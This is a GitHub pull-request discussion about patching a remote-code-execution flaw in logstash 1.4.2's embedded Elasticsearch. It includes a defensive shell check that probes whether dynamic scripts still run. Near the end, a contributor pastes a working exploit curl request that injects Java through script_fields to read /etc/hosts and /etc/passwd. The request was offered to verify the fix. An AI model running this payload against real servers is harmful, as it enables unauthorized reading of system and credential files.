Disable scripting in embedded elastic search #33

Closed · wants to merge 1 commit into base: develop

davedevelopment commented Nov 18, 2014

The version of elasticsearch that comes with logstash 1.4.2 has quite a serious vulnerability; this patch helps prevent the remote code execution (I think). There might be a better way to do it, but I'll leave that to you :)

See http://bouk.co/blog/elasticsearch-rce/ for lots of info.

@pblittle pblittle self-assigned this Nov 19, 2014

pblittle commented Nov 21, 2014

@davedevelopment, I haven't had a chance to review your change yet; I should be able to this weekend. Thanks for the PR, I appreciate it.

pblittle commented Dec 23, 2014

@davedevelopment do you mind giving me a curl command that will trigger the exploit before the fix is applied and will not trigger the exploit after the fix is applied?

There is an example [1] in the 1.4/tests directory. You may need to rebase first. A good bit has changed since your PR.

Thank you.

[1] https://github.com/pblittle/docker-logstash/blob/develop/1.4/tests/logstash.sh#L33
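A check of the kind asked for above, written here as an added example rather than code from the docker-logstash repository: it asks the embedded node to evaluate a harmless script field ("1+1") and passes only when the node refuses, so it fails before the fix and succeeds after it. The ES_URL default and the error strings it matches are assumptions about the setup; an empty index makes the probe inconclusive, which the check also treats as a failure.

```shell
#!/bin/sh
# Added example, not code from the docker-logstash repository.
# Probe whether the embedded Elasticsearch node will evaluate dynamic scripts
# by requesting a script field computed from "1+1". A hardened node must refuse
# it; a node that answers with the computed value is still exposed.
# ES_URL and the error strings matched below are assumptions about the setup.

ES_URL="${ES_URL:-http://localhost:9200}"

# Search body: one hit, match everything, plus a script field named "probe"
# whose only purpose is to reveal whether scripts run at all.
probe_body() {
  printf '%s' '{"size":1,"query":{"match_all":{}},"script_fields":{"probe":{"script":"1+1"}}}'
}

# Classify a raw response body.
#   0 = scripting refused (the fix is in place)
#   1 = the script was evaluated and "probe" came back (still vulnerable)
#   2 = inconclusive, e.g. no documents indexed yet, so no hit could carry the field
classify_response() {
  body="$1"
  case "$body" in
    *"dynamic scripting disabled"*|*"ScriptException"*) return 0 ;;
    *'"probe"'*) return 1 ;;
    *) return 2 ;;
  esac
}

# Send the probe to the running node and return its classification.
run_probe() {
  classify_response "$(curl -s -XPOST "$ES_URL/_search" -d "$(probe_body)")"
}

# Intended for a test script such as 1.4/tests/logstash.sh:
# fail the build unless the node refuses to run the script.
check_scripting_disabled() {
  rc=0
  run_probe || rc=$?
  case "$rc" in
    0) echo "ok: embedded elasticsearch refuses dynamic scripts"; return 0 ;;
    1) echo "FAIL: embedded elasticsearch evaluated a dynamic script"; return 1 ;;
    *) echo "FAIL: inconclusive response from $ES_URL"; return 1 ;;
  esac
}
```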

pblittle commented Dec 23, 2014

@davedevelopment I created a feature/safer-embedded-elasticsearch branch. Will you please point this PR to that branch?


davedevelopment commented Dec 24, 2014

Sorry, I don't really have time to rebase this right now; it seems a lot has changed.

I did, however, copy this curl request from the page I previously mentioned; it might work for you:

curl 'http://localhost:9200/_search?source=%7B%22size%22%3A1%2C%22query%22%3A%7B%22filtered%22%3A%7B%22query%22%3A%7B%22match_all%22%3A%7B%7D%7D%7D%7D%2C%22script_fields%22%3A%7B%22%2Fetc%2Fhosts%22%3A%7B%22script%22%3A%22import%20java.util.*%3B%5Cnimport%20java.io.*%3B%5Cnnew%20Scanner(new%20File(%5C%22%2Fetc%2Fhosts%5C%22)).useDelimiter(%5C%22%5C%5C%5C%5CZ%5C%22).next()%3B%22%7D%2C%22%2Fetc%2Fpasswd%22%3A%7B%22script%22%3A%22import%20java.util.*%3B%5Cnimport%20java.io.*%3B%5Cnnew%20Scanner(new%20File(%5C%22%2Fetc%2Fpasswd%5C%22)).useDelimiter(%5C%22%5C%5C%5C%5CZ%5C%22).next()%3B%22%7D%7D%7D&callback=jQuery1111005464234226383269_1419424336276&_=1419424336277' -H 'Accept: */*' -H 'Referer: http://bouk.co/blog/elasticsearch-rce/poc.html' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36' --compressed

pblittle commented Dec 24, 2014

@davedevelopment, no problem at all. Thanks again.
